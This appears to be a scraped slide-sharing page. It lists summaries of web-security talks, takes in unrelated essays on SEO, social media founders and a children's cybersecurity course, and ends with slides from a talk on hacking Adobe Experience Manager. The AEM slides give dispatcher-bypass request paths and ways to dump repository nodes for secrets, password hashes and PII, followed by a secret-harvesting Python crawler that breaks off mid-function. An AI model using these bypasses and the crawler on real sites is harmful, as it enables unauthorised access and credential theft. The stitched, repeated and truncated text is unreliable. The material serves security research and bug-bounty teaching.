"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DoS, Cross Site Scripting and other web application vulnerabilities, with demo code. Also, we will see things from both the developers' and the attackers' side: what protections developers implement to mitigate file upload issues by validating the file name, the file Content-Type and the actual file content, and how to bypass them all using 15 techniques!
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs, Mikhail Egorov
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition, Soroush Dalili
This document provides an introduction to short file names (SFN) in Windows and discusses issues related to inadvertently disclosing SFNs through IIS. It begins with an overview of how SFNs work and how they map to long file names. It then discusses the history of SFN disclosure through IIS and how it can be abused to reveal sensitive file names. The document provides examples of automatically and manually enumerating SFNs to discover long file names. It concludes with tips and tricks for SFN enumeration along with examples of using it to reveal parts of unknown file names.
Ekoparty 2017 - The Bug Hunter's Methodology, bugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour, Soroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep dive into postMessage and into how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
HTTP Request Smuggling via higher HTTP versions, neexemil
This document summarizes HTTP request smuggling vulnerabilities. It explains how an attacker can craft a single HTTP request that is parsed differently by the frontend and backend servers, allowing the backend to interpret additional hidden requests. Several exploitation techniques and detection methods are described, including issues that can arise with HTTP/1, HTTP/2, and protocols like WebSockets. Automated testing tools have been developed but further research is still needed to fully understand and prevent these attacks.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to JavaScript. See also http://brutelogic.com.br/blog
Nowadays REST APIs are behind every mobile app and nearly all web applications. As such they bring a wide range of possibilities for communication and integration with a given system. But with great power comes great responsibility. This talk aims to provide general guidance related to API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of a potential attacker.
I will show:
* how to find hidden API interfaces
* ways to detect available methods and parameters
* fuzzing and pentesting techniques for API calls
* typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
The slides here are part of my presentation at the Confraria0day meeting in March 2017. It is an introduction to the various HTTP security headers with some insights about them. It covers HSTS, HPKP, X-Frame-Options, Content Security Policy, X-XSS-Protection, X-Content-Type-Options, Referrer-Policy and Set-Cookie options.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
Making Joomla Insecure - Explaining security by breaking it
This document summarizes a presentation about making Joomla insecure and how to protect against common vulnerabilities. It demonstrates how to introduce vulnerabilities like SQL injection, local file inclusion, and cross-site scripting. It then provides tips to secure a Joomla site, such as sanitizing user input, updating to the latest version, using strong passwords, checking for file existence, and more. The goal is to make attendees aware of potential risks and how to properly secure a Joomla website.
This document provides an agenda for a ColdFusion security training session presented by Pete Freitag and David Epler. It includes introductions to the presenters and their backgrounds in ColdFusion and security. The agenda covers common ColdFusion vulnerabilities like file uploads, SQL injection, path traversals, and cross-site scripting. It also demonstrates the OWASP ZAP security tool and provides a sneak peek at a new ColdFusion security analyzer called Raijin/Blizzard. Hands-on lessons are included to allow participants to try exploiting vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
This document provides an overview of Java EE 6 security best practices using the GlassFish application server. It begins with an introduction to the Galleria sample application and how it implements basic security features in Java EE 6 like form-based authentication and role-based authorization. The bulk of the document then summarizes the OWASP Top 10 security risks and provides recommendations for how to address each risk when developing Java EE 6 applications on GlassFish.
This document summarizes a presentation on Java EE 6 security best practices using the GlassFish application server. It discusses the OWASP Top 10 security risks and provides recommendations for how to address each one when developing applications on the Java EE 6 platform. Specific topics covered include injection, cross-site scripting, authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, failure to restrict URL access, insecure cryptographic storage, insufficient transport layer protection, and unvalidated redirects/forwards.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
This document discusses various cross-site scripting (XSS) evasion techniques and evaluates the effectiveness of popular XSS filters and intrusion detection systems (IDS), including ModSecurity, PHP-IDS, and Internet Explorer 8. It provides examples of how attacks can bypass these defenses by exploiting Unicode encoding, HTML/JavaScript tricks, and other methods. The author argues that most filters are ineffective at blocking all XSS variations and recommends ways to strengthen XSS filtering.
The document provides an overview of configuring and using Hibernate, an object-relational mapping tool for Java. It discusses downloading and setting up required libraries, configuring Hibernate properties and mappings, and examples of mapping Java objects to database tables for single entities, primary keys, one-to-many and many-to-many relationships, and reference data. Code samples and explanations are provided for saving, updating, and querying objects using Hibernate.
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
The document discusses the 8 most popular Joomla! hacks and how to avoid them. It summarizes that an outdated Joomla! core, extensions, or themes are vulnerabilities that can be exploited. It also notes that weak passwords, outdated server software, incorrectly configured server software, incorrect Joomla! file permissions, and malware can give hackers access. The document provides tips to avoid these vulnerabilities, such as always updating software, using strong unique passwords, properly configuring servers, setting correct file permissions, and using antivirus software.
This document summarizes best practices for securing Rails applications. It discusses potential information leaks from server headers, status pages, and Subversion metadata. It also covers vulnerabilities like cookie session storage, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), SQL injection, and JavaScript hijacking. The document provides recommendations to address each issue, such as disabling server headers, preventing .svn access, using secure session storage, sanitizing user input, resetting sessions after login, validating CSRF tokens, and escaping values in SQL queries.
Distributed Automation(2018) - London Test Automation in Devops Meetup
This document discusses distributed automation (DA) for running UI tests across scaled cloud infrastructure using Selenium Grid Scaler on AWS. It covers: setting up Selenium Grid hub and nodes on AWS, different grid topologies for parallel testing, making the grid stable through timeout and resource tuning, cost savings through autoscaling and large instance types, and a DA dashboard for monitoring tests. The goal of DA is to run hundreds of tests within the time of the slowest test case through parallelization and scalability.
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Log data contains some of the most valuable raw information you can gather and analyze about your infrastructure and applications. Amid the mess of confusing lines of seemingly random text can be hints about performance, security, flaws in code, user access patterns, and other operational data. Without the proper tools, finding insights in these logs can be like searching for a hay-colored needle in a haystack. In this session you learn what practices and patterns you can easily implement that can help you better understand your log files. You see how you can customize web logs to add more information to them, how to digest logs from around your infrastructure, and how to analyze your log files in near real time.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
- AWS Hardening
- AWS Monitoring
- AWS Disaster Recovery
- GitHub Monitoring
- OPINT
- Software Development Practices/Processes
- Secure use of Jenkins/Hudson
- Developer laptop hardening (OS X)
Splunk forwarders were used to gain initial access to a network by exploiting their default credentials and REST API. This allowed deploying a malicious app that provided a shell. The shell was then used to pillage other systems by abusing credentials and data found in Chef scripts and GitHub repositories. Mitigations include changing default credentials, disabling the REST API on forwarders, improving logging and monitoring for unusual app deployments, using TLS for deployment server communications, and running Splunk in a less privileged manner.
This presentation was prepared for a Webcast where John Yerhot, Engine Yard US Support Lead, and Chris Kelly, Technical Evangelist at New Relic discussed how you can scale and improve the performance of your Ruby web apps. They shared detailed guidance on issues like:
Caching strategies
Slow database queries
Background processing
Profiling Ruby applications
Picking the right Ruby web server
Sharding data
Attendees will learn how to:
Gain visibility on site performance
Improve scalability and uptime
Find and fix key bottlenecks
See the on-demand replay:
http://pages.engineyard.com/6TipsforImprovingRubyApplicationPerformance.html
Crafting a compelling SEO proposal? Learn how to structure a winning SEO proposal template with essential elements and tips for client engagement. Elevate your SEO strategy with expert insights and examples
The advent of social media has revolutionized communication, transforming the way people connect, share, and interact globally. At the forefront of this digital revolution are visionary entrepreneurs who recognized the potential of the internet to foster social connections and create communities. This essay explores the founders of some of the most influential social media platforms, their journeys, and the lasting impact they have made on society.
Mark Zuckerberg, along with his college roommates Eduardo Saverin, Andrew McCollum, Dustin Moskovitz, and Chris Hughes, founded Facebook in 2004. Initially created as a social networking site for Harvard University students, Facebook rapidly expanded to other universities and eventually to the general public. Zuckerberg's vision was to create an online directory that connected people through their real-life social networks.
Twitter, founded in 2006 by Jack Dorsey, Biz Stone, and Evan Williams, brought a new dimension to social media with its microblogging platform. Dorsey envisioned a service that allowed users to share short, real-time updates, limited to 140 characters (now 280). This concise format encouraged rapid sharing of information and fostered a culture of brevity and immediacy.
Kevin Systrom and Mike Krieger co-founded Instagram in 2010, focusing on photo and video sharing. Systrom, who studied photography, wanted to create an app that made mobile photos look professional. The app's unique filters and easy-to-use interface quickly gained popularity, amassing over a million users within two months of its launch.
Instagram's emphasis on visual content has had a significant cultural impact. It has popularized the concept of influencers, giving rise to a new industry where individuals can monetize their popularity and reach. The platform has also revolutionized digital marketing, enabling brands to connect with consumers in more authentic and engaging ways. Acquired by Facebook in 2012, Instagram continues to be a dominant force in social media, shaping trends and cultural norms.
Reid Hoffman founded LinkedIn in 2002 with the goal of creating a professional networking platform. Unlike other social media sites focused on personal connections, LinkedIn was designed to connect professionals, facilitate job searches, and foster business relationships. The platform allows users to create professional profiles, network with colleagues, and share industry insights.
LinkedIn has become an indispensable tool for job seekers, recruiters, and businesses. It has transformed the job market by making it easier to find and connect with potential employers and employees. LinkedIn's influence extends beyond job searches; it has become a hub for professional development, thought leadership, and industry news. Hoffman's vision has significantly impacted how professionals manage their careers and build their networks.
Jan Koum and Brian Acton co-founded WhatsApp in 2009, aiming to create a simple, reliable..
Have you ever built a sandcastle at the beach, only to see it crumble when the tide comes in? In the digital world, our information is like that sandcastle, constantly under threat from waves of cyberattacks. A cybersecurity course is like learning to build a fortress for your information!
This course will teach you how to protect yourself from sneaky online characters who might try to steal your passwords, photos, or even mess with your computer. You'll learn about things like:
* **Spotting online traps:** Phishing emails that look real but could steal your info, and websites that might be hiding malware (like tiny digital monsters).
* **Building strong defenses:** Creating powerful passwords and keeping your software up-to-date, like putting a big, strong lock on your digital door.
* **Fighting back (safely):** Learning how to identify and avoid threats, and what to do if something does go wrong.
By the end of this course, you'll be a cybersecurity champion, ready to defend your digital world and keep your information safe and sound!
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
The document describes a methodology for discovering vulnerabilities in a fictional application with a microservices architecture. It involves mapping out all APIs, endpoints, subdomains and requests to extract a comprehensive list. Parameters are then fuzzed on all combinations to find unintended behaviors like old or unused endpoints exposing more data than intended, or endpoints making internal calls that can be exploited through server-side request forgery or path traversal. Examples are given of similar vulnerabilities discovered in real applications, such as an unused JSON API leaking private user data, path traversal through internal API calls, and account hijacking through improper protection of authentication keys.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
Making Joomla Insecure - Explaining security by breaking it – Tim Plummer
This document summarizes a presentation about making Joomla insecure and how to protect against common vulnerabilities. It demonstrates how to introduce vulnerabilities like SQL injection, local file inclusion, and cross-site scripting. It then provides tips to secure a Joomla site, such as sanitizing user input, updating to the latest version, using strong passwords, checking for file existence, and more. The goal is to make attendees aware of potential risks and how to properly secure a Joomla website.
This document provides an agenda for a ColdFusion security training session presented by Pete Freitag and David Epler. It includes introductions to the presenters and their backgrounds in ColdFusion and security. The agenda covers common ColdFusion vulnerabilities like file uploads, SQL injection, path traversals, and cross-site scripting. It also demonstrates the OWASP ZAP security tool and provides a sneak peek at a new ColdFusion security analyzer called Raijin/Blizzard. Hands-on lessons are included to allow participants to try exploiting vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Slides for the #JavaOne Session ID: CON11881 – Masoud Kalali
This document provides an overview of Java EE 6 security best practices using the GlassFish application server. It begins with an introduction to the Galleria sample application and how it implements basic security features in Java EE 6 like form-based authentication and role-based authorization. The bulk of the document then summarizes the OWASP Top 10 security risks and provides recommendations for how to address each risk when developing Java EE 6 applications on GlassFish.
Java EE 6 Security in practice with GlassFish – Markus Eisele
This document summarizes a presentation on Java EE 6 security best practices using the GlassFish application server. It discusses the OWASP Top 10 security risks and provides recommendations for how to address each one when developing applications on the Java EE 6 platform. Specific topics covered include injection, cross-site scripting, authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, failure to restrict URL access, insecure cryptographic storage, insufficient transport layer protection, and unvalidated redirects/forwards.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems – Felipe Prado
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf – GiorgiRcheulishvili
This document discusses various cross-site scripting (XSS) evasion techniques and evaluates the effectiveness of popular XSS filters and intrusion detection systems (IDS), including ModSecurity, PHP-IDS, and Internet Explorer 8. It provides examples of how attacks can bypass these defenses by exploiting Unicode encoding, HTML/JavaScript tricks, and other methods. The author argues that most filters are ineffective at blocking all XSS variations and recommends ways to strengthen XSS filtering.
The document provides an overview of configuring and using Hibernate, an object-relational mapping tool for Java. It discusses downloading and setting up required libraries, configuring Hibernate properties and mappings, and examples of mapping Java objects to database tables for single entities, primary keys, one-to-many and many-to-many relationships, and reference data. Code samples and explanations are provided for saving, updating, and querying objects using Hibernate.
The top 10 security issues in web applications – Devnology
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
8 Most Popular Joomla Hacks & How To Avoid Them – SiteGround.com
The document discusses the 8 most popular Joomla! hacks and how to avoid them. It summarizes that having an outdated Joomla! core, extensions, or themes are vulnerabilities that can be exploited. It also notes that using weak passwords, outdated server software, incorrectly configured server software, incorrect Joomla! file permissions, and malware can allow hackers access. The document provides tips to avoid these vulnerabilities such as always updating software, using strong unique passwords, properly configuring servers, setting correct file permissions, and using antivirus software.
This document summarizes best practices for securing Rails applications. It discusses potential information leaks from server headers, status pages, and Subversion metadata. It also covers vulnerabilities like cookie session storage, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), SQL injection, and JavaScript hijacking. The document provides recommendations to address each issue, such as disabling server headers, preventing .svn access, using secure session storage, sanitizing user input, resetting sessions after login, validating CSRF tokens, and escaping values in SQL queries.
Distributed Automation (2018) - London Test Automation in Devops Meetup – aragavan
This document discusses distributed automation (DA) for running UI tests across scaled cloud infrastructure using Selenium Grid Scaler on AWS. It covers: setting up Selenium Grid hub and nodes on AWS, different grid topologies for parallel testing, making the grid stable through timeouts and resources tuning, cost savings through autoscaling and large instance types, and a DA dashboard for monitoring tests. The goal of DA is to run hundreds of tests within the time of the slowest test case through parallelization and scalability.
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014 – Amazon Web Services
Log data contains some of the most valuable raw information you can gather and analyze about your infrastructure and applications. Amid the mess of confusing lines of seemingly random text can be hints about performance, security, flaws in code, user access patterns, and other operational data. Without the proper tools, finding insights in these logs can be like searching for a hay-colored needle in a haystack. In this session you learn what practices and patterns you can easily implement that can help you better understand your log files. You see how you can customize web logs to add more information to them, how to digest logs from around your infrastructure, and how to analyze your log files in near real time.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016 – Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Splunk forwarders were used to gain initial access to a network by exploiting their default credentials and REST API. This allowed deploying a malicious app that provided a shell. The shell was then used to pillage other systems by abusing credentials and data found in Chef scripts and GitHub repositories. Mitigations include changing default credentials, disabling the REST API on forwarders, improving logging and monitoring for unusual app deployments, using TLS for deployment server communications, and running Splunk in a less privileged manner.
This presentation was prepared for a Webcast where John Yerhot, Engine Yard US Support Lead, and Chris Kelly, Technical Evangelist at New Relic discussed how you can scale and improve the performance of your Ruby web apps. They shared detailed guidance on issues like:
Caching strategies
Slow database queries
Background processing
Profiling Ruby applications
Picking the right Ruby web server
Sharding data
Attendees will learn how to:
Gain visibility on site performance
Improve scalability and uptime
Find and fix key bottlenecks
See the on-demand replay:
http://pages.engineyard.com/6TipsforImprovingRubyApplicationPerformance.html
2. Mikhail Egorov, @0ang3el
• Security researcher
• Bug hunter (Bugcrowd, H1)
• In Top 20 on Bugcrowd
• Conference speaker: Hack In The Box, Troopers, ZeroNights, PHDays
• https://twitter.com/0ang3el
• https://www.slideshare.net/0ang3el
• https://speakerdeck.com/0ang3el
• https://github.com/0ang3el
3. Why this talk
• AEM is an enterprise-grade CMS
• AEM is widely used by high-profile companies!
3/110
4. Why this talk
Companies that use AEM and have a public bug bounty or vulnerability disclosure program
5. Why this talk
• Using whatruns.com I grabbed 9985 unique domains that use AEM
• 5751 AEM installations were on https://domain-name or https://www.domain-name
6. Why this talk
• AEM is big and complex => room for security bugs!
• 26 known CVEs
• Based on open source projects
  • Apache Felix
  • Apache Sling
  • Apache Jackrabbit Oak (JCR)
• https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html
7. Why this talk
• New tools and techniques
• Details for fresh CVEs
Kudos to Jason Meyer (@zaptechsol)
8. Previous work
• PHDays 2015, @0ang3el
  • https://www.slideshare.net/0ang3el/hacking-aem-sites
9. Previous work
• 2016, @darkarnium
  • http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
15. AEM Dispatcher
• Module for a web server (Apache httpd, IIS)
  • https://www.adobeaemcloud.com/content/companies/public/adobe/dispatcher/dispatcher.html
• Provides caching and a (WAF-like) request filtering layer in front of the Publish instance
16. AEM Dispatcher
• In theory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure
• In practice … it's the only security layer!!!
• Admins rarely keep all components on Publish updated and securely configured
28. Add multiple slashes
• ///etc.json instead of /etc.json
• ///bin///querybuilder.json instead of /bin/querybuilder.json
29. Using SSRF
• We need an SSRF in a component that the AEM dispatcher policy allows
• Effective way to bypass the AEM dispatcher: the SSRF request originates behind it, on the Publish instance itself
30. Things to remember
• Usually the AEM dispatcher is the only security layer
• Usually it's easy to bypass the AEM dispatcher
• AEM admins usually fail to configure the Publish instance securely and to install updates in time
…
• Profit!
37. What we can find
• Everything is stored in the JCR repository as node properties, including:
  • Secrets (passwords, encryption keys, tokens)
  • Configuration
  • PII
  • Usernames
39. DefaultGetServlet
• Returns a JCR node with its properties
• Selectors
  • tidy
  • infinity
  • numeric depth: -1, 0, 1 … 99999
• Formats
  • json
  • xml
  • res – good for retrieving files (raw binary content)
42. DefaultGetServlet – How to grab
• Get node names, starting from jcr:root
  • /.1.json
  • /.ext.json
  • /.childrenlist.json
  • Or guess node names: /content, /home, /var, /etc
• Dump props for each child node of jcr:root
  • /content.json, /content.5.json or /content.-1.json (depth 0, 5 or unlimited)
43. DefaultGetServlet – What to grab
• Interesting nodes
  • /etc – may contain secrets (passwords, encryption keys, …)
  • /apps/system/config or /apps/<smth>/config (passwords, …)
  • /var – may contain private information (PII)
  • /home – password hashes, PII
• Interesting props – reveal AEM user names
  • jcr:createdBy
  • jcr:lastModifiedBy
  • cq:LastModifiedBy
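The walk described on slides 42 and 43 (request `<path>.1.json`, treat nested objects as child nodes, recurse, keep an eye on secret-looking property names and the `*By` properties) as working code. This is an added example for this page, not the speaker's tooling: the HTTP layer is replaced by `fake_get`, which renders `.N.json` views of a constructed in-memory repository, so the crawler runs offline; against a real Publish instance you are authorised to test, `get` would issue `GET https://host/<path>.1.json` instead. Node names containing dots are not handled by the toy URL parser.

```python
"""Walk a Sling JSON tree and grep it for secrets and user names.

Added example; the repository contents and the fake_get transport are
constructed stand-ins, not data from any real AEM instance.
"""
import re

# Constructed repository: path -> properties. Child nodes are implied by path.
REPO = {
    "/": {"jcr:primaryType": "rep:root"},
    "/content": {"jcr:primaryType": "sling:Folder", "jcr:createdBy": "admin"},
    "/content/site": {"jcr:primaryType": "cq:Page", "jcr:lastModifiedBy": "editor42"},
    "/etc": {"jcr:primaryType": "sling:Folder"},
    "/etc/cloudservices": {"jcr:primaryType": "sling:Folder"},
    "/etc/cloudservices/crm": {
        "jcr:primaryType": "nt:unstructured",
        "cq:LastModifiedBy": "integration-svc",
        "username": "api_user",
        "password": "Hunter2!",          # constructed secret
        "tags": ["crm", "prod"],
    },
    "/home": {"jcr:primaryType": "rep:AuthorizableFolder"},
}

# Properties that leak AEM account names (slide 43) and a secret-name heuristic.
USER_PROPS = {"jcr:createdBy", "jcr:lastModifiedBy", "cq:LastModifiedBy"}
SECRET_RE = re.compile(r"pass(word|wd)?|secret|token|apikey|api_key|privatekey", re.I)


def children(path, repo=REPO):
    """Direct child paths of `path` in the constructed repository."""
    prefix = "/" if path == "/" else path + "/"
    return sorted(p for p in repo
                  if p != path and p.startswith(prefix) and "/" not in p[len(prefix):])


def render(path, depth, repo=REPO):
    """Sling-style JSON rendering: the node's properties plus, for depth != 0,
    child nodes nested as objects (a negative depth means unlimited, like .infinity.json)."""
    node = dict(repo[path])
    if depth != 0:
        for child in children(path, repo):
            node[child.rsplit("/", 1)[-1]] = render(child, depth - 1 if depth > 0 else -1, repo)
    return node


def fake_get(url):
    """Stand-in for GET https://target/<path>.<depth>.json; None plays a 404."""
    m = re.fullmatch(r"(/.*?)\.(-?\d+)\.json", url)
    path = m.group(1)
    return render(path, int(m.group(2))) if path in REPO else None


def dump(path, get=fake_get, findings=None):
    """Depth-first walk using .1.json per node (props + direct children).
    Properties are scalars or arrays; a dict value is a child node."""
    findings = findings if findings is not None else {"secrets": [], "users": set()}
    node = get(("/" if path == "/" else path) + ".1.json")      # root: /.1.json
    if node is None:
        return findings
    for key, value in node.items():
        if isinstance(value, dict):
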